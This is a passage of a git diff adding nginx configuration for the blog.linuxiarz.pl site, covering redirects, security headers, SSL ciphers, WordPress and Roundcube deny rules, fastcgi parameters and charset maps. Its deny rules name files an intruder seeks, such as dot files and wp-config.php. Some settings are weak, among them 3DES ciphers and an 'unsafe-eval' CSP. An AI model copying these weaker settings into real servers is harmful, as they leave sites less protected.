https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/2-2/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/1-2/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/1-2/ permanent; +rewrite ^/654/karta-gigabit-ethernet-tp-link-tg-3269/108048_2-1369914764/$ https://blog.linuxiarz.pl/654/karta-gigabit-ethernet-tp-link-tg-3269/108048_2-1369914764/ permanent; +rewrite ^/601/digitemp-i-zapis-do-mysql/ss-dtgraph/$ https://blog.linuxiarz.pl/601/digitemp-i-zapis-do-mysql/ss-dtgraph/ permanent; +rewrite ^/590/pinta-czyli-paint-w-linuxie/zrzut-ekranu-z-2014-01-06-143441/$ https://blog.linuxiarz.pl/590/pinta-czyli-paint-w-linuxie/zrzut-ekranu-z-2014-01-06-143441/ permanent; +rewrite ^/543/nowy-linux/manjaro-logo-comfortaa-font/$ https://blog.linuxiarz.pl/543/nowy-linux/manjaro-logo-comfortaa-font/ permanent; +rewrite ^/525/najnowsze-xbmc-w-debianie/plik-xbmc_logo/$ https://blog.linuxiarz.pl/525/najnowsze-xbmc-w-debianie/plik-xbmc_logo/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/attachment/3/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/attachment/3/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/attachment/2/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/attachment/2/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/attachment/1/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/attachment/1/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123513/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123513/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123502/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123502/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123443/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/img_20131128_123443/ permanent; +rewrite ^/504/bootowalny-dysk-usb-w-linuxie/img_20131123_234938/$ https://blog.linuxiarz.pl/504/bootowalny-dysk-usb-w-linuxie/img_20131123_234938/ permanent; +rewrite ^/504/bootowalny-dysk-usb-w-linuxie/2013-11-23-230920_1366x768_scrot/$ https://blog.linuxiarz.pl/504/bootowalny-dysk-usb-w-linuxie/2013-11-23-230920_1366x768_scrot/ permanent; +rewrite ^/504/bootowalny-dysk-usb-w-linuxie/2013-11-23-231307_1366x768_scrot/$ https://blog.linuxiarz.pl/504/bootowalny-dysk-usb-w-linuxie/2013-11-23-231307_1366x768_scrot/ permanent; +rewrite ^/486/tornado-web-server-minihowto/tornado-128x32/$ https://blog.linuxiarz.pl/486/tornado-web-server-minihowto/tornado-128x32/ permanent; +rewrite ^/467/przegladarka-opera-w-systemach-linux-i-innych/przechwycenie-obrazu-ekranu-12-11-2013-100311/$ https://blog.linuxiarz.pl/467/przegladarka-opera-w-systemach-linux-i-innych/przechwycenie-obrazu-ekranu-12-11-2013-100311/ permanent; +rewrite ^/467/przegladarka-opera-w-systemach-linux-i-innych/przechwycenie-obrazu-ekranu-12-11-2013-100445/$ https://blog.linuxiarz.pl/467/przegladarka-opera-w-systemach-linux-i-innych/przechwycenie-obrazu-ekranu-12-11-2013-100445/ permanent; +rewrite ^/467/przegladarka-opera-w-systemach-linux-i-innych/opera_256x256/$ https://blog.linuxiarz.pl/467/przegladarka-opera-w-systemach-linux-i-innych/opera_256x256/ permanent; +rewrite ^/450/plex-kombajn-multimedialny-na-domowym-serwerze/img_20131110_153936/$ https://blog.linuxiarz.pl/450/plex-kombajn-multimedialny-na-domowym-serwerze/img_20131110_153936/ permanent; +rewrite ^/450/plex-kombajn-multimedialny-na-domowym-serwerze/przechwycenie-obrazu-ekranu-10-11-2013-140247/$ https://blog.linuxiarz.pl/450/plex-kombajn-multimedialny-na-domowym-serwerze/przechwycenie-obrazu-ekranu-10-11-2013-140247/ permanent; +rewrite ^/450/plex-kombajn-multimedialny-na-domowym-serwerze/logo9_160x100/$ https://blog.linuxiarz.pl/450/plex-kombajn-multimedialny-na-domowym-serwerze/logo9_160x100/ permanent; +rewrite ^/447/nowy-hosting-osiagi/smokeping/$ https://blog.linuxiarz.pl/447/nowy-hosting-osiagi/smokeping/ permanent; +rewrite ^/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/index-of/$ https://blog.linuxiarz.pl/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/index-of/ permanent; +rewrite ^/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/404-not-found/$ https://blog.linuxiarz.pl/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/404-not-found/ permanent; +rewrite ^/383/manager-pobierania-aria2-konfiguracja/%e2%86%930-kb-yet-another-aria2-web-frontend/$ https://blog.linuxiarz.pl/383/manager-pobierania-aria2-konfiguracja/%e2%86%930-kb-yet-another-aria2-web-frontend/ permanent; +rewrite ^/383/manager-pobierania-aria2-konfiguracja/active-0-waiting-0-stopped-1-aria2-web-client/$ https://blog.linuxiarz.pl/383/manager-pobierania-aria2-konfiguracja/active-0-waiting-0-stopped-1-aria2-web-client/ permanent; +rewrite ^/369/aplikacja-4-psiandroid-monitor-phpsysinfo-w-androidzie/unnamed/$ https://blog.linuxiarz.pl/369/aplikacja-4-psiandroid-monitor-phpsysinfo-w-androidzie/unnamed/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload_logo-128x44/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload_logo-128x44/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-3/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-3/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-2/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-2/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-1/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web-1/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/pyload-interfejs-web/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/log1/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/log1/ permanent; +rewrite ^/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client-3/$ https://blog.linuxiarz.pl/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client-3/ permanent; +rewrite ^/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-0-waiting-0-stopped-0-aria2-web-client-1/$ https://blog.linuxiarz.pl/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-0-waiting-0-stopped-0-aria2-web-client-1/ permanent; +rewrite ^/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client/$ https://blog.linuxiarz.pl/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client/ permanent; +rewrite ^/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client-1/$ https://blog.linuxiarz.pl/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/active-1-waiting-0-stopped-0-aria2-web-client-1/ permanent; +rewrite ^/341/aria2-na-linux-debian/%e2%86%933-mb-yet-another-aria2-web-frontend/$ https://blog.linuxiarz.pl/341/aria2-na-linux-debian/%e2%86%933-mb-yet-another-aria2-web-frontend/ permanent; +rewrite ^/341/aria2-na-linux-debian/%e2%86%9326-kb-yet-another-aria2-web-frontend/$ https://blog.linuxiarz.pl/341/aria2-na-linux-debian/%e2%86%9326-kb-yet-another-aria2-web-frontend/ permanent; +rewrite ^/332/kompilacja-tvheadend-na-linuxie/hts-tvheadend-3-5-244gf5c5ffd/$ https://blog.linuxiarz.pl/332/kompilacja-tvheadend-na-linuxie/hts-tvheadend-3-5-244gf5c5ffd/ permanent; +rewrite ^/332/kompilacja-tvheadend-na-linuxie/tvheadend/$ https://blog.linuxiarz.pl/332/kompilacja-tvheadend-na-linuxie/tvheadend/ permanent; +rewrite ^/320/phpsysinfo-lighttpd-na-linuxie/system-information-gru-netbook-127-0-0-1/$ https://blog.linuxiarz.pl/320/phpsysinfo-lighttpd-na-linuxie/system-information-gru-netbook-127-0-0-1/ permanent; +rewrite ^/300/termometr-ds1820/img_20130925_152720/$ https://blog.linuxiarz.pl/300/termometr-ds1820/img_20130925_152720/ permanent; +rewrite ^/300/termometr-ds1820/img_20130925_152703/$ https://blog.linuxiarz.pl/300/termometr-ds1820/img_20130925_152703/ permanent; +rewrite ^/300/termometr-ds1820/img_20130925_152629/$ https://blog.linuxiarz.pl/300/termometr-ds1820/img_20130925_152629/ permanent; +rewrite ^/300/termometr-ds1820/rs232/$ https://blog.linuxiarz.pl/300/termometr-ds1820/rs232/ permanent; +rewrite ^/300/termometr-ds1820/9_pin_pin_out/$ https://blog.linuxiarz.pl/300/termometr-ds1820/9_pin_pin_out/ permanent; +rewrite ^/300/termometr-ds1820/ds18b20-pajak-th/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ds18b20-pajak-th/ permanent; +rewrite ^/300/termometr-ds1820/ds18b20-schematds9097e/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ds18b20-schematds9097e/ permanent; +rewrite ^/300/termometr-ds1820/ds18b20_sch1/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ds18b20_sch1/ permanent; +rewrite ^/300/termometr-ds1820/ds18b20_elementy/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ds18b20_elementy/ permanent; +rewrite ^/293/stawiamy-serwer-cs-source-steam/css-start/$ https://blog.linuxiarz.pl/293/stawiamy-serwer-cs-source-steam/css-start/ permanent; +rewrite ^/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-55-07/$ https://blog.linuxiarz.pl/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-55-07/ permanent; +rewrite ^/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-54-23/$ https://blog.linuxiarz.pl/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-54-23/ permanent; +rewrite ^/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-54-17/$ https://blog.linuxiarz.pl/274/aplikacja-3-ds-battery-saver/screenshot_2013-09-15-14-54-17/ permanent; +rewrite ^/233/gargoyle-1-5-10-6-i-nowy-plugin/dlna/$ https://blog.linuxiarz.pl/233/gargoyle-1-5-10-6-i-nowy-plugin/dlna/ permanent; +rewrite ^/225/usuwanie-linuxa-bez-naruszenia-windowsa/bcd/$ https://blog.linuxiarz.pl/225/usuwanie-linuxa-bez-naruszenia-windowsa/bcd/ permanent; +rewrite ^/225/usuwanie-linuxa-bez-naruszenia-windowsa/easybcd-2-1-2/$ https://blog.linuxiarz.pl/225/usuwanie-linuxa-bez-naruszenia-windowsa/easybcd-2-1-2/ permanent; +rewrite ^/217/transmission-control-nowe-gui-dla-transmission/transmission-control/$ https://blog.linuxiarz.pl/217/transmission-control-nowe-gui-dla-transmission/transmission-control/ permanent; +rewrite ^/217/transmission-control-nowe-gui-dla-transmission/transmission-web-control-pl/$ https://blog.linuxiarz.pl/217/transmission-control-nowe-gui-dla-transmission/transmission-web-control-pl/ permanent; +rewrite ^/217/transmission-control-nowe-gui-dla-transmission/transmission-web-control-pl-simplydan-mod-based-on-transmission-control-0-11-beta-2013-07-03-12-22-10/$ https://blog.linuxiarz.pl/217/transmission-control-nowe-gui-dla-transmission/transmission-web-control-pl-simplydan-mod-based-on-transmission-control-0-11-beta-2013-07-03-12-22-10/ permanent; +rewrite ^/199/kompilujemy-transmission-na-linuxie/transmission-daemon/$ https://blog.linuxiarz.pl/199/kompilujemy-transmission-na-linuxie/transmission-daemon/ permanent; +rewrite ^/199/kompilujemy-transmission-na-linuxie/transmission/$ https://blog.linuxiarz.pl/199/kompilujemy-transmission-na-linuxie/transmission/ permanent; +rewrite ^/151/minidlna-czyli-filmy-muzyka-i-zdjecia-w-otoczeniu-sieciowym/minidlna/$ https://blog.linuxiarz.pl/151/minidlna-czyli-filmy-muzyka-i-zdjecia-w-otoczeniu-sieciowym/minidlna/ permanent; +rewrite ^/header/$ https://blog.linuxiarz.pl/header/ permanent; +rewrite ^/bwg_gallery/prestashop/$ https://blog.linuxiarz.pl/bwg_gallery/prestashop/ permanent; +rewrite ^/bwg_gallery/kvm/$ https://blog.linuxiarz.pl/bwg_gallery/kvm/ permanent; +rewrite ^/bwg_gallery/mail-in-a-box-1/$ https://blog.linuxiarz.pl/bwg_gallery/mail-in-a-box-1/ permanent; +rewrite ^/bwg_gallery/mail-in-a-box-2/$ https://blog.linuxiarz.pl/bwg_gallery/mail-in-a-box-2/ permanent; +rewrite ^/bwg_gallery/cowmail/$ https://blog.linuxiarz.pl/bwg_gallery/cowmail/ permanent; +rewrite ^/bwg_gallery/cozy/$ https://blog.linuxiarz.pl/bwg_gallery/cozy/ permanent; +rewrite ^/bwg_gallery/mailpile/$ https://blog.linuxiarz.pl/bwg_gallery/mailpile/ permanent; +rewrite ^/bwg_share/image/$ https://blog.linuxiarz.pl/bwg_share/image/ permanent; +rewrite ^/category/blog/$ https://blog.linuxiarz.pl/category/blog/ permanent; +rewrite ^/category/linux/$ https://blog.linuxiarz.pl/category/linux/ permanent; +rewrite ^/category/og/$ https://blog.linuxiarz.pl/category/og/ permanent; +rewrite ^/category/and/$ https://blog.linuxiarz.pl/category/and/ permanent; +rewrite ^/category/komputery-i-inne/$ https://blog.linuxiarz.pl/category/komputery-i-inne/ permanent; +rewrite ^/category/moje-projekty/$ https://blog.linuxiarz.pl/category/moje-projekty/ permanent; +rewrite ^/category/and/android-aplikacje/$ https://blog.linuxiarz.pl/category/and/android-aplikacje/ permanent; +rewrite ^/category/codziennosc/$ https://blog.linuxiarz.pl/category/codziennosc/ permanent; +rewrite ^/category/openwrt/$ https://blog.linuxiarz.pl/category/openwrt/ permanent; +rewrite ^/category/bsd/$ https://blog.linuxiarz.pl/category/bsd/ permanent; +rewrite ^/tag/sofar/$ https://blog.linuxiarz.pl/tag/sofar/ permanent; +rewrite ^/tag/sofarsolar-monitoring/$ https://blog.linuxiarz.pl/tag/sofarsolar-monitoring/ permanent; +rewrite ^/tag/sofarsolar-ktl-x/$ https://blog.linuxiarz.pl/tag/sofarsolar-ktl-x/ permanent; +rewrite ^/tag/sofar-ktl-x/$ https://blog.linuxiarz.pl/tag/sofar-ktl-x/ permanent; +rewrite ^/tag/sofar-grafana/$ https://blog.linuxiarz.pl/tag/sofar-grafana/ permanent; +rewrite ^/tag/sofar-influxdb/$ https://blog.linuxiarz.pl/tag/sofar-influxdb/ permanent; diff --git a/config/security.conf b/config/security.conf new file mode 100755 index 0000000..28497b7 --- /dev/null +++ b/config/security.conf @@ -0,0 +1,19 @@ +# security headers +add_header X-Frame-Options "SAMEORIGIN" always; +add_header X-XSS-Protection "1; mode=block" always; +add_header X-Content-Type-Options "nosniff" always; +add_header Referrer-Policy "no-referrer-when-downgrade" always; +#add_header Content-Security-Policy "default-src 'self' http: https: data: blob: 'unsafe-inline'" always; +add_header Strict-Transport-Security "max-age=31536000" always; +#add_header Content-Security-Policy "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';" always; +#add_header Content-Security-Policy "default-src https:" always; +add_header Content-security-policy "upgrade-insecure-requests"; +add_header Permissions-Policy 'interest-cohort=()' always; +add_header Cross-Origin-Embedder-Policy "unsafe-none; report-to=default" always; +add_header Cross-Origin-Opener-Policy "unsafe-none; report-to=default" always; +add_header Cross-Origin-Resource-Policy "cross-origin" always; + +# . files +location ~ /\.(?!well-known) { + deny all; +} diff --git a/config/security_paste.conf b/config/security_paste.conf new file mode 100644 index 0000000..7df18c3 --- /dev/null +++ b/config/security_paste.conf @@ -0,0 +1,19 @@ +# security headers +#add_header X-Frame-Options "SAMEORIGIN" always; +#add_header X-XSS-Protection "1; mode=block" always; +#add_header X-Content-Type-Options "nosniff" always; +#add_header Referrer-Policy "no-referrer-when-downgrade" always; +add_header Strict-Transport-Security "max-age=31536000" always; + +#add_header Content-Security-Policy "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';" always; +#add_header Referrer-Policy "no-referrer-when-downgrade" always; +#add_header Permissions-Policy "autoplay=(), encrypted-media=(), fullscreen=(), geolocation=(), microphone=(), midi=()" always; +#add_header Cross-Origin-Embedder-Policy "unsafe-none; report-to=default" always; +#add_header Cross-Origin-Opener-Policy "unsafe-none; report-to=default" always; +#add_header Cross-Origin-Resource-Policy "cross-origin" always; + + +# . files +location ~ /\.(?!well-known) { + deny all; +} diff --git a/config/security_roundcube.conf b/config/security_roundcube.conf new file mode 100644 index 0000000..da4ac2d --- /dev/null +++ b/config/security_roundcube.conf @@ -0,0 +1,18 @@ +# roundcube headers +add_header Content-Security-Policy "default-src 'none'; frame-src 'self'; connect-src 'self'; object-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self'; frame-ancestors 'self'; form-action 'self'; base-uri poczta.linuxiarz.pl webmail.linuxiarz.pl" always; +add_header X-XSS-Protection "1; mode=block" always; +add_header X-Content-Type-Options "nosniff" always; +add_header Referrer-Policy "no-referrer-when-downgrade" always; +add_header Strict-Transport-Security "max-age=31536000" always; +add_header Permissions-Policy "fullscreen=(self), geolocation=*" always; +add_header Cross-Origin-Embedder-Policy "unsafe-none; report-to=default" always; +add_header Cross-Origin-Opener-Policy "unsafe-none; report-to=default" always; +add_header Cross-Origin-Resource-Policy "cross-origin" always; + +location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; +} + +location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; +} diff --git a/config/security_wp.conf b/config/security_wp.conf new file mode 100755 index 0000000..91e126e --- /dev/null +++ b/config/security_wp.conf @@ -0,0 +1,12 @@ +# security headers +#add_header X-Frame-Options "SAMEORIGIN" always; +add_header X-XSS-Protection "1; mode=block" always; +add_header X-Content-Type-Options "nosniff" always; +add_header Referrer-Policy "no-referrer-when-downgrade" always; +#add_header Content-Security-Policy "default-src 'self' http: https: data: blob: 'unsafe-inline'" always; +add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always; + +# . files +location ~ /\.(?!well-known) { + deny all; +} diff --git a/config/ssl_cfg.conf b/config/ssl_cfg.conf new file mode 100644 index 0000000..bceb0c8 --- /dev/null +++ b/config/ssl_cfg.conf @@ -0,0 +1,7 @@ + +ssl_dhparam /etc/ssl/certs/dhparam.pem; +ssl_ecdh_curve secp384r1; +ssl_prefer_server_ciphers on; +ssl_session_cache shared:SSL:10m; +#ssl_ciphers ECDHE-RSA-AES256-GCM-SHA512:DHE-RSA-AES256-GCM-SHA512:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384; +ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:ECDHE-RSA-AES128-GCM-SHA256:AES256+EECDH:DHE-RSA-AES128-GCM-SHA256:AES256+EDH:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4"; diff --git a/config/wildcard.conf b/config/wildcard.conf new file mode 100644 index 0000000..f5c146a --- /dev/null +++ b/config/wildcard.conf @@ -0,0 +1,12 @@ + +ssl_dhparam /etc/ssl/certs/dhparam.pem; +ssl_ecdh_curve secp256r1; +ssl_prefer_server_ciphers on; +ssl_session_cache shared:SSL:10m; +#ssl_ciphers ECDHE-RSA-AES256-GCM-SHA512:DHE-RSA-AES256-GCM-SHA512:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384; +ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:ECDHE-RSA-AES128-GCM-SHA256:AES256+EECDH:DHE-RSA-AES128-GCM-SHA256:AES256+EDH:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4"; +# SSL +ssl_certificate /etc/ssl/linuxiarz.pl/fullchain.pem; +ssl_certificate_key /etc/ssl/linuxiarz.pl/privkey.pem; +#ssl_trusted_certificate /etc/letsencrypt/live/linuxiarz.pl/chain.pem; + diff --git a/config/wordpress.conf b/config/wordpress.conf new file mode 100755 index 0000000..6773769 --- /dev/null +++ b/config/wordpress.conf @@ -0,0 +1,27 @@ +# WordPress: allow TinyMCE +location = /wp-includes/js/tinymce/wp-tinymce.php { + include config/php_fastcgi.conf; +} + +# WordPress: deny wp-content, wp-includes php files +location ~* ^/(?:wp-content|wp-includes)/.*\.php$ { + deny all; +} + +# WordPress: deny wp-content/uploads nasty stuff +location ~* ^/wp-content/uploads/.*\.(?:s?html?|php|js|swf)$ { + deny all; +} + +# WordPress: SEO plugin +location ~* ^/wp-content/plugins/wordpress-seo(?:-premium)?/css/main-sitemap\.xsl$ {} + +# WordPress: deny wp-content/plugins (except earlier rules) +location ~ ^/wp-content/plugins { + deny all; +} + +# WordPress: deny general stuff +location ~* ^/(?:xmlrpc\.php|wp-links-opml\.php|wp-config\.php|wp-config-sample\.php|wp-comments-post\.php|readme\.html|license\.txt)$ { + deny all; +} diff --git a/fastcgi.conf b/fastcgi.conf new file mode 100644 index 0000000..d53a628 --- /dev/null +++ b/fastcgi.conf @@ -0,0 +1,27 @@ + +fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; +fastcgi_param QUERY_STRING $query_string; +fastcgi_param REQUEST_METHOD $request_method; +fastcgi_param CONTENT_TYPE $content_type; +fastcgi_param CONTENT_LENGTH $content_length; + +fastcgi_param SCRIPT_NAME $fastcgi_script_name; +fastcgi_param REQUEST_URI $request_uri; +fastcgi_param DOCUMENT_URI $document_uri; +fastcgi_param DOCUMENT_ROOT $document_root; +fastcgi_param SERVER_PROTOCOL $server_protocol; +fastcgi_param REQUEST_SCHEME $scheme; +fastcgi_param HTTPS $https if_not_empty; + +fastcgi_param GATEWAY_INTERFACE CGI/1.1; +fastcgi_param SERVER_SOFTWARE nginx/$nginx_version; + +fastcgi_param REMOTE_ADDR $remote_addr; +fastcgi_param REMOTE_PORT $remote_port; +fastcgi_param REMOTE_USER $remote_user; +fastcgi_param SERVER_ADDR $server_addr; +fastcgi_param SERVER_PORT $server_port; +fastcgi_param SERVER_NAME $server_name; + +# PHP only, required if PHP was built with --enable-force-cgi-redirect +fastcgi_param REDIRECT_STATUS 200; diff --git a/fastcgi_params b/fastcgi_params new file mode 100644 index 0000000..28decb9 --- /dev/null +++ b/fastcgi_params @@ -0,0 +1,25 @@ + +fastcgi_param QUERY_STRING $query_string; +fastcgi_param REQUEST_METHOD $request_method; +fastcgi_param CONTENT_TYPE $content_type; +fastcgi_param CONTENT_LENGTH $content_length; + +fastcgi_param SCRIPT_NAME $fastcgi_script_name; +fastcgi_param REQUEST_URI $request_uri; +fastcgi_param DOCUMENT_URI $document_uri; +fastcgi_param DOCUMENT_ROOT $document_root; +fastcgi_param SERVER_PROTOCOL $server_protocol; +fastcgi_param REQUEST_SCHEME $scheme; +fastcgi_param HTTPS $https if_not_empty; + +fastcgi_param GATEWAY_INTERFACE CGI/1.1; +fastcgi_param SERVER_SOFTWARE nginx/$nginx_version; + +fastcgi_param REMOTE_ADDR $remote_addr; +fastcgi_param REMOTE_PORT $remote_port; +fastcgi_param SERVER_ADDR $server_addr; +fastcgi_param SERVER_PORT $server_port; +fastcgi_param SERVER_NAME $server_name; + +# PHP only, required if PHP was built with --enable-force-cgi-redirect +fastcgi_param REDIRECT_STATUS 200; diff --git a/koi-utf b/koi-utf new file mode 100644 index 0000000..e7974ff --- /dev/null +++ b/koi-utf @@ -0,0 +1,109 @@ + +# This map is not a full koi8-r <> utf8 map: it does not contain +# box-drawing and some other characters. Besides this map contains +# several koi8-u and Byelorussian letters which are not in koi8-r. +# If you need a full and standard map, use contrib/unicode2nginx/koi-utf +# map instead. + +charset_map koi8-r utf-8 { + + 80 E282AC ; # euro + + 95 E280A2 ; # bullet + + 9A C2A0 ; #   + + 9E C2B7 ; # · + + A3 D191 ; # small yo + A4 D194 ; # small Ukrainian ye + + A6 D196 ; # small Ukrainian i + A7 D197 ; # small Ukrainian yi + + AD D291 ; # small Ukrainian soft g + AE D19E ; # small Byelorussian short u + + B0 C2B0 ; # ° + + B3 D081 ; # capital YO + B4 D084 ; # capital Ukrainian YE + + B6 D086 ; # capital Ukrainian I + B7 D087 ; # capital Ukrainian YI + + B9 E28496 ; # numero sign + + BD D290 ; # capital Ukrainian soft G + BE D18E ; # capital Byelorussian short U + + BF C2A9 ; # (C) + + C0 D18E ; # small yu + C1 D0B0 ; # small a + C2 D0B1 ; # small b + C3 D186 ; # small ts + C4 D0B4 ; # small d + C5 D0B5 ; # small ye + C6 D184 ; # small f + C7 D0B3 ; # small g + C8 D185 ; # small kh + C9 D0B8 ; # small i + CA D0B9 ; # small j + CB D0BA ; # small k + CC D0BB ; # small l + CD D0BC ; # small m + CE D0BD ; # small n + CF D0BE ; # small o + + D0 D0BF ; # small p + D1 D18F ; # small ya + D2 D180 ; # small r + D3 D181 ; # small s + D4 D182 ; # small t + D5 D183 ; # small u + D6 D0B6 ; # small zh + D7 D0B2 ; # small v + D8 D18C ; # small soft sign + D9 D18B ; # small y + DA D0B7 ; # small z + DB D188 ; # small sh + DC D18D ; # small e + DD D189 ; # small shch + DE D187 ; # small ch + DF D18A ; # small hard sign + + E0 D0AE ; # capital YU + E1 D090 ; # capital A + E2 D091 ; # capital B + E3 D0A6 ; # capital TS + E4 D094 ; # capital D + E5 D095 ; # capital YE + E6 D0A4 ; # capital F + E7 D093 ; # capital G + E8 D0A5 ; # capital KH + E9 D098 ; # capital I + EA D099 ; # capital J + EB D09A ; # capital K + EC D09B ; # capital L + ED D09C ; # capital M + EE D09D ; # capital N + EF D09E ; # capital O + + F0 D09F ; # capital P + F1 D0AF ; # capital YA + F2 D0A0 ; # capital R + F3 D0A1 ; # capital S + F4 D0A2 ; # capital T + F5 D0A3 ; # capital U + F6 D096 ; # capital ZH + F7 D092 ; # capital V + F8 D0AC ; # capital soft sign + F9 D0AB ; # capital Y + FA D097 ; # capital Z + FB D0A8 ; # capital SH + FC D0AD ; # capital E + FD D0A9 ; # capital SHCH + FE D0A7 ; # capital CH + FF D0AA ; # capital hard sign +} diff --git a/koi-win b/koi-win new file mode 100644 index 0000000..72afabe --- /dev/null +++ b/koi-win @@ -0,0 +1,103 @@ + +charset_map koi8-r windows-1251 { + + 80 88 ; # euro + + 95 95 ; # bullet + + 9A A0 ; #   + + 9E B7 ; # · + + A3 B8 ; # small yo + A4 BA ; # small Ukrainian ye + + A6 B3 ; # small Ukrainian i + A7 BF ; # small Ukrainian yi + + AD B4 ; # small Ukrainian soft g + AE A2 ; # small Byelorussian short u + + B0 B0 ; # ° + + B3 A8 ; # capital YO + B4 AA ; # capital Ukrainian YE + + B6 B2 ; # capital Ukrainian I + B7 AF ; # capital Ukrainian YI + + B9 B9 ; # numero sign + + BD A5 ; # capital Ukrainian soft G + BE A1 ; # capital Byelorussian short U + + BF A9 ; # (C) + + C0 FE ; # small yu + C1 E0 ; # small a + C2 E1 ; # small b + C3 F6 